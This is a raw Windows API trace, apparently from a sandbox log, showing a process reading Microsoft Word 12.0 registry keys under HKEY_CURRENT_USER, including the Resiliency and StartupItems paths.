[0086.259] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.259] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.259] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.259] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x35c) returned 0x0
[0086.259] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.260] RegCloseKey (hKey=0x35c) returned 0x0
[0086.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.261] RegCloseKey (hKey=0x35c) returned 0x0
[0086.261] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x35c) returned 0x0
[0086.262] RegCloseKey (hKey=0x35c) returned 0x0
[0086.262] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x35c) returned 0x0
[0086.263] RegCloseKey (hKey=0x35c) returned 0x0
[0086.263] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x35c) returned 0x0
[0086.263] RegCloseKey (hKey=0x35c) returned 0x0
[0086.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x0) returned 0x2
[0086.264] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x35c) returned 0x0
[0086.264] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.264] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3c4) returned 0x0
[0086.264] RegCloseKey (hKey=0x35c) returned 0x0
[0086.264] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x35c) returned 0x0
[0086.265] RegCloseKey (hKey=0x3c4) returned 0x0
[0086.265] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3c4) returned 0x0
[0086.265] RegCloseKey (hKey=0x35c) returned 0x0
[0086.265] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x35c) returned 0x0
[0086.265] RegCloseKey (hKey=0x3c4) returned 0x0
[0086.265] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x0) returned 0x2
[0086.265] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c4) returned 0x0
[0086.265] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.265] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x414) returned 0x0
[0086.266] RegCloseKey (hKey=0x3c4) returned 0x0
[0086.266] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.266] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c4) returned 0x0
[0086.266] RegCloseKey (hKey=0x414) returned 0x0
[0086.266] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.266] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x414) returned 0x0
[0086.266] RegCloseKey (hKey=0x3c4) returned 0x0
[0086.266] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.266] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c4) returned 0x0
[0086.266] RegCloseKey (hKey=0x414) returned 0x0
[0086.266] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x0) returned 0x2
[0086.266] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x0) returned 0x2
[0086.267] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.267] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x414) returned 0x0
[0086.267] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.267] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3c8) returned 0x0
[0086.267] RegCloseKey (hKey=0x414) returned 0x0
[0086.267] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.267] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x414) returned 0x0
[0086.267] RegCloseKey (hKey=0x3c8) returned 0x0
[0086.267] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.267] RegOpenKeyExW (in: hKey=0x414, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3c8) returned 0x0
[0086.267] RegCloseKey (hKey=0x414) returned 0x0
[0086.267] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.267] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x414) returned 0x0
[0086.267] RegCloseKey (hKey=0x3c8) returned 0x0
[0086.268] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81caec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81caec*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cae8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.268] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x0) returned 0x2
[0086.268] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.268] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c8) returned 0x0
[0086.268] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.268] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.268] RegCloseKey (hKey=0x3c8) returned 0x0
